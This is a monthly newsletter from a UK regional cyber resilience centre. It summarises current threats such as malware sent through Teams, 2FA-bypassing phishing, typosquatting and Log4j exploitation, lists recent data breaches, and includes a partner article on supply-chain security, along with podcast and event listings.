The latest news from SWCRC

Welcome to this month’s updates and threat assessment. Like the headlines, this edition is significantly coloured by Russian activities in Ukraine, and the National Cyber Security Centre has been issuing communications about the need for UK businesses to review their cyber security and cyber resilience. This isn’t about small businesses becoming able to repel targeted attacks by a cyber power – it’s about the fact that we’re likely to see more ransomware, which can often be fairly indiscriminate in the way that it operates. 

This month, we also include a thought-provoking article from our trusted partner PGI, looking at supply chain security. Are you checking on the cyber credentials of businesses that you transact with, or do you just assume that the emails and documents they send you are safe? If they don’t know where to start, we’ll give them some free pointers – just put them in our direction. And you’ll see a link for our first ever breakfast network. It’s part of our effort to become more social, and in years to come, you’ll be able to tell your grandkids “I was there”. And on that basis, we’ll look forward to seeing you on the day, to discover more about the intriguing world of the dark web.

Mark Moore, Director, SWCRC 
Monthly threat assessment

As ever, your best defences are to do these simple things well: good passwords, two factor authentication, and backups to start with. If you want to review what you can do, either contact us or go back to the NCSC small business guide – and of course you can consider the cyber essentials scheme which walks you through how to get a lot safer and can come with free insurance too.   

1)   Attachments

You know that you should watch out for attachments in emails. In the arms race that is cyber criminality, you need to consider other attachments too. Specifically, there’s an increase in malware circulating via Microsoft Teams, a medium that most of us trust. When an office 365 account is compromised, it becomes possible to use Teams to send files to external organisations via messages, or even to place files into internal Teams chats, so as to spread throughout the network. You and your people need to be aware of this as a new threat, which (see below) is only going to increase. See here for more details.

One of the reasons for the increase will likely be a change by Microsoft, which will ramp up the warnings issued to users who are invited to ‘enable macros’ when opening attachments. The change will start roll out in early April, and will affect Microsoft Access, Excel, PowerPoint, Visio, and Word on Windows devices. Macros were designed by Microsoft to automate common tasks in Microsoft Office but have often been used to facilitate malware. So the change should make it harder for traditional malware channels to succeed, forcing criminals to become more creative. Although the update won’t prevent users from enabling macros, it will give a lot more information about the risks of doing so. 

2)  Man-in-the-middle attacks

Also on the subject of fake emails and clicking in the wrong place: this article may be of interest to the more expert in our cyber community. For the rest of us, it shows how a scammer can bypass even two factor authentication, prompting you to enter your own password to log into a system whose details – including the one-time passcode – are then stored on the scammer’s own computer. It’s called a man-in-the-middle attack. The limiting factor with this method is that it has to be highly targeted. I’d need to create a bespoke link for every individual that I want to compromise. But that might well be worth doing if I were trying to compromise a company owner, finance director or the like. The takeaway message is that whilst 2fa has always been and remains one of the most important things you can do to bolster your security, cybercriminals will always be working to find a way around. So stay vigilant about unexpected requests to log on to any system, particularly when they arise as a result of a link.

3)  Typosquatting

We’re hearing increasing reports about so-called typosquatting attacks, where a spurious website is created and manipulated towards the top of the search rankings. These websites are often used to offer free software which is actually malicious. This might be for things like a free video player, antivirus software, or printing tools. There’s a whole industry around this: you can actually create your own malware, and then get it onto a site like this on a ‘pay per click’ basis, if you don’t have the SEO skills to get to the google front page by yourself!  Our advice is to go via recognised app stores wherever you can, and if you have the ability, to restrict what users can download to company computers.   Last month, the HP threat team The HP Threat Team identified a campaign in which a false Windows 11 installer has been seen to distribute malware called RedLine Stealer, via a site that looked like a windows upgrade downloader. An image appears below (don’t visit it!). This malware can collect information from some  web browsers, including logins, passwords, autofill data, cookies, and personal submitted information including credit card numbers.


 4)    Threat actors

Also of interest this month was a report from BT intelligence services that there is a rise in the number of threat actors seeking collaborators on the inside of companies. Some are willing to pay more than £10,000 for access to sensitive networks. Others are taking advantage of vulnerable employees, preying on them via dating platforms before coercing them. As cyber security gets better, insiders are a good way to bypass your protective measures. So our advice is to always ensure that your people can access only the information that they need, and make sure they know that they have ways to report concerns to you safely. 
5)    VirusTotal and log4j updates

Lastly, before we come to this month’s breaches of interest, a couple of items of interest for our more expert members. VirusTotal is essentially a community-based tool that lets experts exchange thoughts on the safety of files, and some work by the team behind@malwrhunterteam recently has called its methods into question. Essentially, they were able to mark malware as safe by providing a string of positive reviews, and there is minimal checking on the veracity of users who may give themselves reputable-sounding titles. Worth being aware of, and exercising caution. And in the world of log4j, security company Morphisec, have identified threat actors using a customised public exploit for the Log4j vulnerability to take over Ubiquiti network appliances running on the UniFi software. Although a patch was released quickly, the assessment is that a number of Ubiquiti customers have yet to apply it. If this is you, or someone that you know, get updating. 

6) Breaches

In this month’s breaches, there are several that might affect you. Your basic minimum response if not aware already is to change your password on that site and any others that use it; to implement two factor-authentication where the facility exists, and to be aware that future contacts from the company ought to be thoroughly checked out, rather than taken at face value. Worth following these reports up directly with the company, if you’re involved and they’ve not already contacted you.

*  Parasol, a company that provides PAYE payroll services for around 28000 contractors via its parent company Optionis, has suffered a breach whose extent is not yet entirely clear. More detail here if you’re worried and think that you might be affected, but it looks likely that there could be a host of information from personal details and bank details through to more comprehensive company accounting details. 

*  A company called Onfido which provides the facility for others to receive secure information has been subject to an insecurity. Onfido say that this is about the improper deployment of their tool, but as a result, Europcar, Chip (a UK saving app) and FxPro Direct have had user data leaked. It is thought to include passport details, driving licences and ID cards. 

*  Element Vape – a vaping site, surprisingly -  has found an active credit card skimmer on their site. If you’re a customer, stay alert for suspicious transactions, and if in doubt, contact your bank. 

*  The British Council have suffered a breach which includes personal data for almost 150,000 students. Detail includes names, usernames, email addresses, and study notes. 

*  And lastly, the Internet Society (ISOC) has identified a breach of membership details affecting thousands of people. Data exposed includes full names, addresses, gender, login details and password hashes. 


Supply chain: Is your security entirely in your hands?

You can never be 100% certain that your suppliers have a strong security posture—more often than not, you can only take them at their word. But there are ways to minimise the risk.

What does a supply chain threat look like?

Let’s look at NotPetya. The origin of the biggest global cyberattack to date, was the widely-used Ukrainian accounting software, M.E.Doc. The developers of that software had poor cyber security measures in place, which enabled Russian-State actors to infect their servers—once a user updated their software, they were also infected. This attack resulted in the loss of millions for businesses globally, including the world’s largest shipping company, Maersk—the seemingly simple installation of M.E.Doc software on one computer at Maersk’s office in Odessa, caused a company-wide outage.

The key point here is that M.E.Doc was a trusted supplier for most businesses in the Ukraine because the software was used to interact with Ukrainian tax systems. When we trust a supplier, we often don’t question what security measures they have in place, sometimes to our own detriment. 

Addressing supply chain security

Regardless of whether IT or procurement (or some other department) is responsible for supply chain security, it’s the consistent approach that’s vital. So, how do you consistently assess the level of risk each supplier brings? Much will depend upon criticality. If your payment portal is hacked, that’s a major operational disruption that could cause loss of income and reputation damage. But if your external recruitment company is hit and you need to engage a new recruitment firm, it’s an inconvenience but won’t cripple your business.

At a basic level, the process of assessing the level of risk should include considering:

  • The criticality of the supplier (i.e., Do your core operations depend upon this supplier?)
  • Their access (e.g., Are you sharing data with the supplier? Do they have access to your systems? 
Once you have established the supplier risk levels, you will need to:
  • Define your own security requirements (i.e., What assurance do you want from high, medium and low risk suppliers?)
  • Determine how the supplier can best demonstrate compliance with your requirements (e.g., onsite security audits, completion of a security questionnaire, proof of Cyber Essentials certification)
What happens if something goes wrong?

You’ve put in place your own controls, and criteria for your suppliers, but what happens if something goes wrong and your supplier is breached, resulting in your organisation being compromised? You’ll need a comprehensive incident response plan—that will give you the framework to minimise damage and get the business operating again—and to ensure that your cyber insurance policy covers damage caused by supplier compromise.

How PGI can help secure your supply chain

PGI offers a range of services to help you gain a deeper understanding and more control over your supply chain management, including creating and implementing risk assessment processes, creating supplier assurance policies and procedures (such as security-related contract clauses, and due diligence questionnaires), and carrying out onsite supply chain audits.

If you’re ready to take more control of your supply chain, talk to us: Call on +44 (0) 845 600 4403 or email via

Cyber Beat Podcast

Ross Brown this week talks to Keith Buzzard CTO of Protection Group International about the different types of Cyber Attack. With the current situation developing between Russia nd Ukraine and with a heightened threat of Cyber Attacks as a result this Podcast has never been more relevant. Keith gives practical advice on the attacks themselves, how to mitigate them and most importantly staff awareness.

You can find the podcasts on Spotify or Google Podcasts. Click the image to go to Google Podcasts.

Dates for your diary

March 23rd - Secure South West

Keynote Speaker Erika Lewis, DCMS Director of Cyber Security and Digital Identity 

March 31st 0815 - 0845   Cereal and Cyber

Our first webinar for SWCRC members (and guests) focusing on ethical hacking.

In line with the National Cyber Security Centre's recent warning following the situation in Ukraine, the South West Regional Cyber Crime Unit are urging organisations to be extra vigilant with regards to online security. 

While we are not aware of any current specific threats to the UK in relation to recent events, there has been an historical pattern of cyber attacks on Ukraine with international consequences. 

The guidance linked to in the NCSC alert includes 11 actions to take to strengthen your organisation's resilience. Please follow these steps to reduce the risk of falling victim to an attack.